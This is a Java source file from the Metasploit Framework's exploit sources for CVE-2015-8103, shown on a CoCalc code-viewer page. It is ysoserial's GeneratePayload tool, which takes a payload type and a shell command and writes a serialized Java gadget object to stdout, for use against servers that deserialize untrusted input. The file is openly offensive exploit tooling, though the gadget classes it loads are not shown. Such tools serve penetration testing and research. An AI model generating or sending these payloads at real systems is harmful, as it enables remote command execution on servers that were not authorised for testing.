CoCalc -- GeneratePayload.java

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2015-8103/GeneratePayload.java
Views: ¹¹⁷⁸⁰

1
package ysoserial;
2

3
import java.io.ObjectOutputStream;
4
import java.util.ArrayList;
5
import java.util.Collection;
6
import java.util.Collections;
7
import java.util.Comparator;
8
import java.util.List;
9
import java.util.Set;
10

11
import org.reflections.Reflections;
12

13
import ysoserial.payloads.ObjectPayload;
14

15
@SuppressWarnings("rawtypes")
16
public class GeneratePayload {
17

18
	private static final int INTERNAL_ERROR_CODE = 70;
19
	private static final int USAGE_CODE = 64;
20

21
	public static void main(final String[] args) {
22
		if (args.length != 2) {
23
			printUsage();
24
			System.exit(USAGE_CODE);
25
		}
26
		final String payloadType = args[0];
27
		final String command = args[1];
28
		
29
		final Class<? extends ObjectPayload> payloadClass = getPayloadClass(payloadType);
30
		if (payloadClass == null || !ObjectPayload.class.isAssignableFrom(payloadClass)) {
31
			System.err.println("Invalid payload type '" + payloadType + "'");
32
			printUsage();
33
			System.exit(USAGE_CODE);
34
		}
35
		
36
		try {
37
			final ObjectPayload payload = payloadClass.newInstance();
38
			final Object object = payload.getObject(command);
39
			final ObjectOutputStream objOut = new ObjectOutputStream(System.out);
40
			objOut.writeObject(object);
41
		} catch (Throwable e) {
42
			System.err.println("Error while generating or serializing payload");
43
			e.printStackTrace();
44
			System.exit(INTERNAL_ERROR_CODE);
45
		}		
46
		System.exit(0);		
47
	}
48
	
49
	@SuppressWarnings("unchecked")
50
	private static Class<? extends ObjectPayload> getPayloadClass(final String className) {
51
		try {
52
			return (Class<? extends ObjectPayload>) Class.forName(className);				
53
		} catch (Exception e1) {		
54
		}
55
		try {
56
			return (Class<? extends ObjectPayload>) Class.forName(GeneratePayload.class.getPackage().getName() 
57
				+ ".payloads."  + className);
58
		} catch (Exception e2) {				
59
		}			
60
		return null;		
61
	}
62
	
63
	private static void printUsage() {
64
		System.err.println("Y SO SERIAL?");
65
		System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'");
66
		System.err.println("\tAvailable payload types:");	
67
		final List<Class<? extends ObjectPayload>> payloadClasses = 
68
			new ArrayList<Class<? extends ObjectPayload>>(getPayloadClasses());
69
		Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
70
		for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
71
			System.err.println("\t\t" + payloadClass.getSimpleName());
72
		}
73
	}
74
	
75
	// get payload classes by classpath scanning
76
	private static Collection<Class<? extends ObjectPayload>> getPayloadClasses() {
77
		final Reflections reflections = new Reflections(GeneratePayload.class.getPackage().getName());
78
		final Set<Class<? extends ObjectPayload>> payloadTypes = reflections.getSubTypesOf(ObjectPayload.class);		
79
		return payloadTypes;
80
	}	
81

82
	public static class ToStringComparator implements Comparator<Object> {
83
		public int compare(Object o1, Object o2) { return o1.toString().compareTo(o2.toString()); }
84
	}	
85

86
}
87

88

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.